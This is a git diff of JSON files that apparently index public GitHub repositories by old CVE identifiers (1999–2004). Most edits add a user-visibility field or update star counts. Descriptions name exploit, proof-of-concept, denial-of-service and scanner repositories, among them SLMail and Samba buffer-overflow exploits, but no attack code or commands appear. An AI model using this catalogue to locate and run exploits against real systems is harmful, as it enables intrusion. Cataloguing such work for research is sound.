diff --git a/1999/CVE-1999-0016.json b/1999/CVE-1999-0016.json index f353b113a7..1de853b3f7 100644 --- a/1999/CVE-1999-0016.json +++ b/1999/CVE-1999-0016.json @@ -7,7 +7,8 @@ "login": "pexmee", "id": 60260590, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60260590?v=4", - "html_url": "https:\/\/github.com\/pexmee" + "html_url": "https:\/\/github.com\/pexmee", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pexmee\/CVE-1999-0016-Land-DOS-tool", "description": "A simple dos-tool ", @@ -37,7 +38,8 @@ "login": "Pommaq", "id": 42520348, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42520348?v=4", - "html_url": "https:\/\/github.com\/Pommaq" + "html_url": "https:\/\/github.com\/Pommaq", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Pommaq\/CVE-1999-0016-POC", "description": null, diff --git a/1999/CVE-1999-0532.json b/1999/CVE-1999-0532.json index ce6a1379cd..27a31c2680 100644 --- a/1999/CVE-1999-0532.json +++ b/1999/CVE-1999-0532.json @@ -7,7 +7,8 @@ "login": "websecnl", "id": 20278695, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20278695?v=4", - "html_url": "https:\/\/github.com\/websecnl" + "html_url": "https:\/\/github.com\/websecnl", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/websecnl\/Bulk_CVE-1999-0532_Scanner", "description": "A tool i made for use in combination with hackerone.com for Bounty Hacking purposes.", @@ -37,7 +38,8 @@ "login": "Rodney-O-C-Melby", "id": 16503898, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16503898?v=4", - "html_url": "https:\/\/github.com\/Rodney-O-C-Melby" + "html_url": "https:\/\/github.com\/Rodney-O-C-Melby", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Rodney-O-C-Melby\/dns-zone-transfer-test", "description": "Automates Domain Name System (DNS) zone transfer testing. Checks for CVE-1999-0532 by automatically finding a given domains nameservers, and tests for zone transfers, if successful, subdomains are printed to standard output.", diff --git a/1999/CVE-1999-1053.json b/1999/CVE-1999-1053.json index a3cc941360..c499141691 100644 --- a/1999/CVE-1999-1053.json +++ b/1999/CVE-1999-1053.json @@ -7,7 +7,8 @@ "login": "siunam321", "id": 104430134, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104430134?v=4", - "html_url": "https:\/\/github.com\/siunam321" + "html_url": "https:\/\/github.com\/siunam321", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/siunam321\/CVE-1999-1053-PoC", "description": "CVE-1999-1053 Proof-of-Concept Exploit", diff --git a/2000/CVE-2000-0114.json b/2000/CVE-2000-0114.json index 3319ff6273..79bfb5790d 100644 --- a/2000/CVE-2000-0114.json +++ b/2000/CVE-2000-0114.json @@ -7,7 +7,8 @@ "login": "Cappricio-Securities", "id": 102907425, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", - "html_url": "https:\/\/github.com\/Cappricio-Securities" + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2000-0114", "description": "Microsoft FrontPage Extensions Check (shtml.dll)", @@ -48,7 +49,8 @@ "login": "Josekutty-K", "id": 155238968, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155238968?v=4", - "html_url": "https:\/\/github.com\/Josekutty-K" + "html_url": "https:\/\/github.com\/Josekutty-K", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Josekutty-K\/frontpage-server-extensions-vulnerability-scanner", "description": "Python script to scan for CVE-2000-0114 vulnerability in Frontpage Server Extensions. Automates subdomain enumeration and vulnerability scanning using subfinder and nuclei. For educational and professional use in cybersecurity assessments.", @@ -78,7 +80,8 @@ "login": "adhamelhansye", "id": 145185592, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145185592?v=4", - "html_url": "https:\/\/github.com\/adhamelhansye" + "html_url": "https:\/\/github.com\/adhamelhansye", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/adhamelhansye\/CVE-2000-0114", "description": "This a CVE I found it in VDP at hackerone Platform", diff --git a/2000/CVE-2000-0170.json b/2000/CVE-2000-0170.json index 05f3bcfd24..035b90c0b8 100644 --- a/2000/CVE-2000-0170.json +++ b/2000/CVE-2000-0170.json @@ -7,7 +7,8 @@ "login": "mike182", "id": 509504, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/509504?v=4", - "html_url": "https:\/\/github.com\/mike182" + "html_url": "https:\/\/github.com\/mike182", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mike182\/exploit", "description": "CVE-2000-0170", diff --git a/2000/CVE-2000-0649.json b/2000/CVE-2000-0649.json index 2ee5be7f50..407cab5305 100644 --- a/2000/CVE-2000-0649.json +++ b/2000/CVE-2000-0649.json @@ -7,7 +7,8 @@ "login": "rafaelh", "id": 3272113, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3272113?v=4", - "html_url": "https:\/\/github.com\/rafaelh" + "html_url": "https:\/\/github.com\/rafaelh", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/rafaelh\/CVE-2000-0649", "description": "Test for CVE-2000-0649, and return an IP address if vulnerable", @@ -42,7 +43,8 @@ "login": "stevenvegar", "id": 70730301, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70730301?v=4", - "html_url": "https:\/\/github.com\/stevenvegar" + "html_url": "https:\/\/github.com\/stevenvegar", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/stevenvegar\/cve-2000-0649", "description": "Script fo testing CVE-2000-0649 for Apache and MS IIS servers", @@ -72,7 +74,8 @@ "login": "Downgraderz", "id": 19348425, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19348425?v=4", - "html_url": "https:\/\/github.com\/Downgraderz" + "html_url": "https:\/\/github.com\/Downgraderz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Downgraderz\/PoC-CVE-2000-0649", "description": "A small tool to create a PoC for CVE-2000-0649.", diff --git a/2000/CVE-2000-0979.json b/2000/CVE-2000-0979.json index 14b2496fdb..d6e2ae30ba 100644 --- a/2000/CVE-2000-0979.json +++ b/2000/CVE-2000-0979.json @@ -7,7 +7,8 @@ "login": "Z6543", "id": 1755029, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1755029?v=4", - "html_url": "https:\/\/github.com\/Z6543" + "html_url": "https:\/\/github.com\/Z6543", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Z6543\/CVE-2000-0979", "description": "CVE-2000-0979", diff --git a/2001/CVE-2001-0550.json b/2001/CVE-2001-0550.json index 0170bfa9c0..3a4879e7eb 100644 --- a/2001/CVE-2001-0550.json +++ b/2001/CVE-2001-0550.json @@ -7,7 +7,8 @@ "login": "gilberto47831", "id": 60636483, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60636483?v=4", - "html_url": "https:\/\/github.com\/gilberto47831" + "html_url": "https:\/\/github.com\/gilberto47831", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gilberto47831\/Network-Filesystem-Forensics", "description": "Reports on post-exploitation on honeypot exploiting vulnerable wu-ftpd (CVE-2001-0550)", diff --git a/2001/CVE-2001-0680.json b/2001/CVE-2001-0680.json index 39dc074bae..7c0cd0e419 100644 --- a/2001/CVE-2001-0680.json +++ b/2001/CVE-2001-0680.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2001-0680", "description": "Directory traversal vulnerability in ftpd in QPC QVT\/Net 4.0 and AVT\/Term 5.0", diff --git a/2001/CVE-2001-0758.json b/2001/CVE-2001-0758.json index e5161669ea..5004abd826 100644 --- a/2001/CVE-2001-0758.json +++ b/2001/CVE-2001-0758.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2001-0758", "description": "Directory traversal vulnerability in Shambala 4.5 ", diff --git a/2001/CVE-2001-0931.json b/2001/CVE-2001-0931.json index ce3b17aa7b..f822b5d498 100644 --- a/2001/CVE-2001-0931.json +++ b/2001/CVE-2001-0931.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2001-0931", "description": "Directory traversal vulnerability in Cooolsoft PowerFTP Server 2.03 allows attackers to list or read arbitrary files and directories via a .. (dot dot) in (1) LS or (2) GET.", diff --git a/2001/CVE-2001-0932.json b/2001/CVE-2001-0932.json index 0c0ae0252e..3fdee76720 100644 --- a/2001/CVE-2001-0932.json +++ b/2001/CVE-2001-0932.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2001-0932", "description": "Cooolsoft PowerFTP Server 2.0 3\/2.10 - Multiple Denial of Service Vulnerabilities", diff --git a/2001/CVE-2001-0933.json b/2001/CVE-2001-0933.json index b54ff74fb7..e33d5a1f97 100644 --- a/2001/CVE-2001-0933.json +++ b/2001/CVE-2001-0933.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2001-0933", "description": "Cooolsoft PowerFTP Server 2.03 allows remote attackers to list the contents of arbitrary drives via a ls (LIST) command that includes the drive letter as an argument, e.g. \"ls C:\".", diff --git a/2001/CVE-2001-0934.json b/2001/CVE-2001-0934.json index 1a81f32e34..46e8846c13 100644 --- a/2001/CVE-2001-0934.json +++ b/2001/CVE-2001-0934.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2001-0934", "description": "Cooolsoft PowerFTP Server 2.03 allows remote attackers to obtain the physical path of the server root via the pwd command, which lists the full pathname.", diff --git a/2001/CVE-2001-1442.json b/2001/CVE-2001-1442.json index 498d680aca..fe3ba3f4a3 100644 --- a/2001/CVE-2001-1442.json +++ b/2001/CVE-2001-1442.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2001-1442", "description": "ISC INN 2.x - Command-Line Buffer Overflow", diff --git a/2001/CVE-2001-1473.json b/2001/CVE-2001-1473.json index 96f447edb2..d02af1c9f0 100644 --- a/2001/CVE-2001-1473.json +++ b/2001/CVE-2001-1473.json @@ -7,7 +7,8 @@ "login": "p1ton3rr", "id": 184847683, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184847683?v=4", - "html_url": "https:\/\/github.com\/p1ton3rr" + "html_url": "https:\/\/github.com\/p1ton3rr", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/p1ton3rr\/poc-cve-2001-1473", "description": "A novel approach to the old problem", diff --git a/2001/CVE-2001-3389.json b/2001/CVE-2001-3389.json index a652496196..aeb8a27461 100644 --- a/2001/CVE-2001-3389.json +++ b/2001/CVE-2001-3389.json @@ -7,7 +7,8 @@ "login": "becrevex", "id": 8326868, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8326868?v=4", - "html_url": "https:\/\/github.com\/becrevex" + "html_url": "https:\/\/github.com\/becrevex", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/becrevex\/Gaston", "description": "BEAST (CVE-2001-3389) Checker", diff --git a/2002/CVE-2002-0200.json b/2002/CVE-2002-0200.json index 3a46b2b75d..e8bfa81c69 100644 --- a/2002/CVE-2002-0200.json +++ b/2002/CVE-2002-0200.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0200", "description": "Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name.", diff --git a/2002/CVE-2002-0201.json b/2002/CVE-2002-0201.json index 03450fb116..065c326370 100644 --- a/2002/CVE-2002-0201.json +++ b/2002/CVE-2002-0201.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0201", "description": "Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow.", diff --git a/2002/CVE-2002-0288.json b/2002/CVE-2002-0288.json index d2ec8f812e..52692b614f 100644 --- a/2002/CVE-2002-0288.json +++ b/2002/CVE-2002-0288.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0288", "description": "Phusion WebServer 1.0 - Directory Traversal", diff --git a/2002/CVE-2002-0289.json b/2002/CVE-2002-0289.json index d5b563cfc0..1941be84ed 100644 --- a/2002/CVE-2002-0289.json +++ b/2002/CVE-2002-0289.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0289", "description": "Phusion WebServer 1.0 - 'URL' Remote Buffer Overflow", diff --git a/2002/CVE-2002-0346.json b/2002/CVE-2002-0346.json index 6dee8a9bab..bf44f2214d 100644 --- a/2002/CVE-2002-0346.json +++ b/2002/CVE-2002-0346.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0346", "description": "Cross-site scripting vulnerability in Cobalt RAQ 4 allows remote attackers to execute arbitrary script as other Cobalt users via Javascript in a URL to (1) service.cgi or (2) alert.cgi.", diff --git a/2002/CVE-2002-0347.json b/2002/CVE-2002-0347.json index bb01cf375d..384d6b069a 100644 --- a/2002/CVE-2002-0347.json +++ b/2002/CVE-2002-0347.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0347", "description": "Directory traversal vulnerability in Cobalt RAQ 4 allows remote attackers to read password-protected files, and possibly files outside the web root, via a .. (dot dot) in an HTTP request.", diff --git a/2002/CVE-2002-0348.json b/2002/CVE-2002-0348.json index 4f4ca9b7d6..4422205075 100644 --- a/2002/CVE-2002-0348.json +++ b/2002/CVE-2002-0348.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0348", "description": "service.cgi in Cobalt RAQ 4 allows remote attackers to cause a denial of service", diff --git a/2002/CVE-2002-0448.json b/2002/CVE-2002-0448.json index b471786442..9b0121dc43 100644 --- a/2002/CVE-2002-0448.json +++ b/2002/CVE-2002-0448.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0448", "description": "Xerver 2.10 - Multiple Request Denial of Service Vulnerabilities", diff --git a/2002/CVE-2002-0740.json b/2002/CVE-2002-0740.json index 43924cd11a..dfe339b905 100644 --- a/2002/CVE-2002-0740.json +++ b/2002/CVE-2002-0740.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0740", "description": "SLRNPull Spool Directory Command Line Parameter Buffer Overflow Vulnerability", diff --git a/2002/CVE-2002-0748.json b/2002/CVE-2002-0748.json index 834fb47e60..431b3cf801 100644 --- a/2002/CVE-2002-0748.json +++ b/2002/CVE-2002-0748.json @@ -7,7 +7,8 @@ "login": "fauzanwijaya", "id": 139438257, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139438257?v=4", - "html_url": "https:\/\/github.com\/fauzanwijaya" + "html_url": "https:\/\/github.com\/fauzanwijaya", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fauzanwijaya\/CVE-2002-0748", "description": "Proof of concept for LabVIEW Web Server HTTP Get Newline DoS vulnerability", diff --git a/2002/CVE-2002-0991.json b/2002/CVE-2002-0991.json index fdddff51d7..68344efb45 100644 --- a/2002/CVE-2002-0991.json +++ b/2002/CVE-2002-0991.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2002-0991", "description": "Buffer overflows in the cifslogin command for HP CIFS\/9000 Client A.01.06 and earlier", diff --git a/2002/CVE-2002-1614.json b/2002/CVE-2002-1614.json index f94be48dcc..4368bd4907 100644 --- a/2002/CVE-2002-1614.json +++ b/2002/CVE-2002-1614.json @@ -7,7 +7,8 @@ "login": "wlensinas", "id": 17731891, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17731891?v=4", - "html_url": "https:\/\/github.com\/wlensinas" + "html_url": "https:\/\/github.com\/wlensinas", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/wlensinas\/CVE-2002-1614", "description": null, diff --git a/2002/CVE-2002-20001.json b/2002/CVE-2002-20001.json index 969eb7646b..b11a61048e 100644 --- a/2002/CVE-2002-20001.json +++ b/2002/CVE-2002-20001.json @@ -7,16 +7,17 @@ "login": "c0r0n3r", "id": 979146, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/979146?v=4", - "html_url": "https:\/\/github.com\/c0r0n3r" + "html_url": "https:\/\/github.com\/c0r0n3r", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/c0r0n3r\/dheater", "description": "D(HE)ater is a proof of concept implementation of the D(HE)at attack (CVE-2002-20001) through which denial-of-service can be performed by enforcing the Diffie-Hellman key exchange. (read-only clone of the original GitLab project)", "fork": false, "created_at": "2021-08-31T09:51:12Z", - "updated_at": "2024-10-03T06:28:07Z", + "updated_at": "2024-10-17T20:53:33Z", "pushed_at": "2024-05-03T22:24:07Z", - "stargazers_count": 184, - "watchers_count": 184, + "stargazers_count": 185, + "watchers_count": 185, "has_discussions": false, "forks_count": 27, "allow_forking": true, @@ -46,7 +47,7 @@ ], "visibility": "public", "forks": 27, - "watchers": 184, + "watchers": 185, "score": 0, "subscribers_count": 8 } diff --git a/2002/CVE-2002-2420.json b/2002/CVE-2002-2420.json index 508e8cc31f..47e6f5fd39 100644 --- a/2002/CVE-2002-2420.json +++ b/2002/CVE-2002-2420.json @@ -7,7 +7,8 @@ "login": "krdsploit", "id": 104392085, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104392085?v=4", - "html_url": "https:\/\/github.com\/krdsploit" + "html_url": "https:\/\/github.com\/krdsploit", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/krdsploit\/CVE-2002-2420", "description": "The New Exploit there no available on metasploit framework !", diff --git a/2003/CVE-2003-0001.json b/2003/CVE-2003-0001.json index b224fe04f2..f1b871e1fd 100644 --- a/2003/CVE-2003-0001.json +++ b/2003/CVE-2003-0001.json @@ -7,7 +7,8 @@ "login": "marb08", "id": 22150927, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22150927?v=4", - "html_url": "https:\/\/github.com\/marb08" + "html_url": "https:\/\/github.com\/marb08", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/marb08\/etherleak-checker", "description": "This Python script helps to detect the Etherleak (CVE-2003-0001) vulnerability on a target host by analyzing the padding data in network packets. The script uses Scapy to send various types of requests (ICMP, ARP, or TCP) and checks if the responses contain any padding data that could potentially leak sensitive memory contents.", diff --git a/2003/CVE-2003-0172.json b/2003/CVE-2003-0172.json index 55de4ce2dd..15bfd122d9 100644 --- a/2003/CVE-2003-0172.json +++ b/2003/CVE-2003-0172.json @@ -7,7 +7,8 @@ "login": "cyberdesu", "id": 78768764, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78768764?v=4", - "html_url": "https:\/\/github.com\/cyberdesu" + "html_url": "https:\/\/github.com\/cyberdesu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cyberdesu\/Remote-Buffer-overflow-CVE-2003-0172", "description": null, diff --git a/2003/CVE-2003-0201.json b/2003/CVE-2003-0201.json index aa52b55cca..4652386176 100644 --- a/2003/CVE-2003-0201.json +++ b/2003/CVE-2003-0201.json @@ -7,7 +7,8 @@ "login": "KernelPan1k", "id": 3338681, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3338681?v=4", - "html_url": "https:\/\/github.com\/KernelPan1k" + "html_url": "https:\/\/github.com\/KernelPan1k", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/KernelPan1k\/trans2open-CVE-2003-0201", "description": "Samba exploit CVE2003-0201", diff --git a/2003/CVE-2003-0222.json b/2003/CVE-2003-0222.json index 97e093d888..040249748e 100644 --- a/2003/CVE-2003-0222.json +++ b/2003/CVE-2003-0222.json @@ -7,7 +7,8 @@ "login": "phamthanhsang280477", "id": 45278781, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45278781?v=4", - "html_url": "https:\/\/github.com\/phamthanhsang280477" + "html_url": "https:\/\/github.com\/phamthanhsang280477", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/phamthanhsang280477\/CVE-2003-0222", "description": "CVE-2003-0222", diff --git a/2003/CVE-2003-0264.json b/2003/CVE-2003-0264.json index 0ba0b5ac30..46165f5e67 100644 --- a/2003/CVE-2003-0264.json +++ b/2003/CVE-2003-0264.json @@ -7,7 +7,8 @@ "login": "adenkiewicz", "id": 1060275, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1060275?v=4", - "html_url": "https:\/\/github.com\/adenkiewicz" + "html_url": "https:\/\/github.com\/adenkiewicz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/adenkiewicz\/CVE-2003-0264", "description": "Exploit for CVE-2003-0264 based on pwntools and metasploit's windows\/reverse_tcp", @@ -37,7 +38,8 @@ "login": "fyoderxx", "id": 31161670, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31161670?v=4", - "html_url": "https:\/\/github.com\/fyoderxx" + "html_url": "https:\/\/github.com\/fyoderxx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fyoderxx\/slmail-exploit", "description": "Exploit SLmail Buffer Overflow CVE-2003-0264", @@ -67,7 +69,8 @@ "login": "war4uthor", "id": 45926018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", - "html_url": "https:\/\/github.com\/war4uthor" + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/war4uthor\/CVE-2003-0264", "description": "CVE-2003-0264 - SLMail 5.5 POP3 'PASS' Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.", @@ -97,7 +100,8 @@ "login": "pwncone", "id": 57570315, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57570315?v=4", - "html_url": "https:\/\/github.com\/pwncone" + "html_url": "https:\/\/github.com\/pwncone", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pwncone\/CVE-2003-0264-SLmail-5.5", "description": "A POC remote buffer overflow for CVE-2003-0264 - SLMail 5.5", @@ -127,7 +131,8 @@ "login": "vrikodar", "id": 73271976, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73271976?v=4", - "html_url": "https:\/\/github.com\/vrikodar" + "html_url": "https:\/\/github.com\/vrikodar", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vrikodar\/CVE-2003-0264_EXPLOIT", "description": "Buffer Overflow in Seattle Lab Mail (SLmail) 5.5 - POP3", @@ -166,7 +171,8 @@ "login": "nobodyatall648", "id": 35725871, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35725871?v=4", - "html_url": "https:\/\/github.com\/nobodyatall648" + "html_url": "https:\/\/github.com\/nobodyatall648", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nobodyatall648\/CVE-2003-0264", "description": "CVE-2003-0264 SLMail5.5_RemoteBufferOverflow", diff --git a/2003/CVE-2003-0282.json b/2003/CVE-2003-0282.json index c3ffc13864..f983054a72 100644 --- a/2003/CVE-2003-0282.json +++ b/2003/CVE-2003-0282.json @@ -7,7 +7,8 @@ "login": "silasol", "id": 24622986, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24622986?v=4", - "html_url": "https:\/\/github.com\/silasol" + "html_url": "https:\/\/github.com\/silasol", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/silasol\/cve-2003-0282", "description": null, diff --git a/2003/CVE-2003-0358.json b/2003/CVE-2003-0358.json index 472f194aab..f5c2a56da5 100644 --- a/2003/CVE-2003-0358.json +++ b/2003/CVE-2003-0358.json @@ -7,7 +7,8 @@ "login": "gmh5225", "id": 13917777, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", - "html_url": "https:\/\/github.com\/gmh5225" + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gmh5225\/CVE-2003-0358", "description": "By passing an overly large string when invoking nethack, it is possible to corrupt memory. jnethack and falconseye are also prone to this vulnerability.", @@ -37,7 +38,8 @@ "login": "fengjixuchui", "id": 2487206, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2487206?v=4", - "html_url": "https:\/\/github.com\/fengjixuchui" + "html_url": "https:\/\/github.com\/fengjixuchui", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fengjixuchui\/CVE-2003-0358", "description": "By passing an overly large string when invoking nethack, it is possible to corrupt memory. jnethack and falconseye are also prone to this vulnerability.", diff --git a/2004/CVE-2004-0558.json b/2004/CVE-2004-0558.json index 320de2ce6f..8ff8f119f4 100644 --- a/2004/CVE-2004-0558.json +++ b/2004/CVE-2004-0558.json @@ -7,7 +7,8 @@ "login": "fibonascii", "id": 11827510, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11827510?v=4", - "html_url": "https:\/\/github.com\/fibonascii" + "html_url": "https:\/\/github.com\/fibonascii", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fibonascii\/CVE-2004-0558", "description": null, diff --git a/2004/CVE-2004-1561.json b/2004/CVE-2004-1561.json index 9b279b7292..41c62858ca 100644 --- a/2004/CVE-2004-1561.json +++ b/2004/CVE-2004-1561.json @@ -7,7 +7,8 @@ "login": "ivanitlearning", "id": 52420671, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52420671?v=4", - "html_url": "https:\/\/github.com\/ivanitlearning" + "html_url": "https:\/\/github.com\/ivanitlearning", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ivanitlearning\/CVE-2004-1561", "description": "Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32)", @@ -37,7 +38,8 @@ "login": "ratiros01", "id": 